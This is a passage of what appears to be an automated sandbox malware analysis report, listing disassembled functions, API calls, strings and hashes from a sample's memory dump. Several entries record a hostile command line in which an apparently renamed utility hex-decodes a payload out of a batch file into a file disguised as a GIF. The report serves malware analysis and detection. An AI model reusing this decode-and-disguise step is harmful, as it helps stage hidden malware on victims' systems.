                                              • Instruction Fuzzy Hash: 45616D62A0978281EB24DB61A4447F5B3A4FF4CBACF440136DA0D97778DF3EE5448B0A
                                              Function 00007FF6EB1993E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                              • String ID:
                                              • API String ID: 3829876242-3916222277
                                              • Opcode ID: 4f22813eede9613b07e2ee34b1665593af95064faf104fdc635e57dc54895536
                                              • Instruction ID: 7466e4f7777947a5a14b25700c278e1062f17cadc73bbdb9a79fddf36565dae5
                                              • Opcode Fuzzy Hash: 4f22813eede9613b07e2ee34b1665593af95064faf104fdc635e57dc54895536
                                              • Instruction Fuzzy Hash: 21618433A0468286E6159B11E5143BAB7A1FF8DBA8F448135DE0E877A4DF3EE9058B05
                                              Function 00007FF6EB182B94 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 110COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 $EQU$GEQ$GTR$LEQ$LSS$NEQ
                                              • API String ID: 0-1950234451
                                              • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                              • Instruction ID: 9c611f5caeab65f055414132ba03f641f3da6a75506b94537e7462cbd08bb736
                                              • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                              • Instruction Fuzzy Hash: 4D516D22A0C64382F7159F21A4143F97AA1BF4DBADF445135DA4EC62B4DF3EA409878B
                                              Function 00007FF6EB1A03AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$ErrorLast$InformationVolume
                                              • String ID: %04X-%04X$~
                                              • API String ID: 2748242238-2468825380
                                              • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                              • Instruction ID: 4ab8217f81740f3186004c5d79c4f15fd0339335c26692a4c2896b950306b0d0
                                              • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                              • Instruction Fuzzy Hash: 99A19463708BC28AEB258F21D8543E977A1FB89798F404035D94D8B7A8DF3DE6498B01
                                              Function 00007FF6EB17D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D884
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D89D
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D94D
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17D964
                                              • _wcsnicmp.MSVCRT ref: 00007FF6EB17DB89
                                              • wcstol.MSVCRT ref: 00007FF6EB17DBDF
                                              • wcstol.MSVCRT ref: 00007FF6EB17DC63
                                              • memmove.MSVCRT ref: 00007FF6EB17DD33
                                              • memmove.MSVCRT ref: 00007FF6EB17DE9A
                                              • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF6EB17FE2A), ref: 00007FF6EB17DF1F
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                              • String ID:
                                              • API String ID: 1051989028-0
                                              • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                              • Instruction ID: fd5e218cc736c01176c38da9c780b78f46bf57c2b01e293d6ce791817e98fa58
                                              • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                              • Instruction Fuzzy Hash: D10293B3A0C75981EA209F14E4403B976A1FB8EBA8F544135DA8D937E4DFBEE041C709
                                              Function 00007FF6EB186FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                              • String ID: \\.\
                                              • API String ID: 799470305-2900601889
                                              • Opcode ID: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                              • Instruction ID: c921b16e3b583b01f8a1ae33f6fe78510b67b411945271d4a11eab010e8593f6
                                              • Opcode Fuzzy Hash: 4180f233f4b8de15694120a786ea8bf0d50e59174174331ff54520a46fcb6cef
                                              • Instruction Fuzzy Hash: 8B51A033A08B82C5EB618F20E8013F967A0FB8DBA8F495535DA4E87BA4DF3DD5458705
                                              Function 00007FF6EB175458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1754DE
                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB17552B
                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB17554F
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB19345F
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB19347E
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB1934C3
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB1934DB
                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF6EB171F7D), ref: 00007FF6EB1934FA
                                                • Part of subcall function 00007FF6EB1836EC: _get_osfhandle.MSVCRT ref: 00007FF6EB183715
                                                • Part of subcall function 00007FF6EB1836EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB183770
                                                • Part of subcall function 00007FF6EB1836EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB183791
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                              • String ID:
                                              • API String ID: 1356649289-0
                                              • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                              • Instruction ID: 025797300da41e52b255f845c3479cecd4e98ec701baa0ceef90b22512e442ca
                                              • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                              • Instruction Fuzzy Hash: 74917033A0864297E6149F25F5043B9B6A1FB8EBA8F544135DA4E837B4DF3EE444CB09
                                              Function 00007FF6EB1714E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                              • String ID: :$\
                                              • API String ID: 3961617410-1166558509
                                              • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                              • Instruction ID: 013a2b510f4e1a1cd9f999fca9265c15e42033a515d752337a67516eb43014be
                                              • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                              • Instruction Fuzzy Hash: A7216023A0864286EB544B60A5442F9A6A1FB4FBACF448131D91FC37B0DF7DE4498A06
                                              Function 00007FF6EB1A0C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                              • String ID: &()[]{}^=;!%'+,`~
                                              • API String ID: 2516562204-381716982
                                              • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                              • Instruction ID: ba21f98d1b1ca0d6dd683a174fe03297bbbc71cd6dea17cfb0a1d73ae9ba05e4
                                              • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                              • Instruction Fuzzy Hash: 84C1BE33A0469286E7508F25E9403BE77A0FB49BA8F441139DE8D93BA8DF3DE454CB05
                                              Function 00007FF6EB19A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                              • String ID: NTDLL.DLL$NtQueryInformationProcess
                                              • API String ID: 1580871199-2613899276
                                              • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                              • Instruction ID: cd36b768485b0d75adb9a13a70e9a23a1ecef2e1ee26173eb939aa9145c2887b
                                              • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                              • Instruction Fuzzy Hash: 19519373B18B8282EB108B15E4003B977A4FB8DBA8F455135DA9E87764DF3DE005CB49
                                              Function 00007FF6EB171F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$EnvironmentVariable
                                              • String ID: DIRCMD
                                              • API String ID: 1405722092-1465291664
                                              • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                              • Instruction ID: 1814c9bce6caa3f5ae6518d7b5a2011b79cfb4f7d928d97b093ca57e0abb9750
                                              • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                              • Instruction Fuzzy Hash: 55816E73A18BD28AEB20CF60E8403ED77A5FB4A758F104139DA4D97B68DF38D1458B05
                                              Function 00007FF6EB19D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                              • String ID:
                                              • API String ID: 3192234081-0
                                              • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                              • Instruction ID: e19ea9c48758fcf2ae5c322ec63986ad6d96848224a672fa183f3a8eaaffe353
                                              • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                              • Instruction Fuzzy Hash: 9D3188326086528BE7109F21F4047BDBB51FB8EBA8F449134DE4A977A5CF3DD4058B05
                                              Function 00007FF6EB17DF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 , xrefs: 00007FF6EB17E00B
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$FreeProcess_setjmp
                                              • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
                                              • API String ID: 777023205-853097648
                                              • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                              • Instruction ID: cf36f06f133a62bc00b5ab22ec418b7a044bb8251ed11f02a5af64e0218fa24b
                                              • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                              • Instruction Fuzzy Hash: 84512633A0DA52C5EA518B15F8903B8B6A4FF4DB6CF544436D90DC33B9DF7EA441860A
                                              Function 00007FF6EB181FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memsetwcsspn
                                              • String ID:
                                              • API String ID: 3809306610-0
                                              • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                              • Instruction ID: a73a8792297089c6f666fa89e20f1ad291be07f4851f4fb20ae85c6dd45a969f
                                              • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                              • Instruction Fuzzy Hash: A8B1A163A08B4682EA518F15E4503F9B7A1FB4DBA8F848031DA4E877B4DF7EE441C746
                                              Function 00007FF6EB1834A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
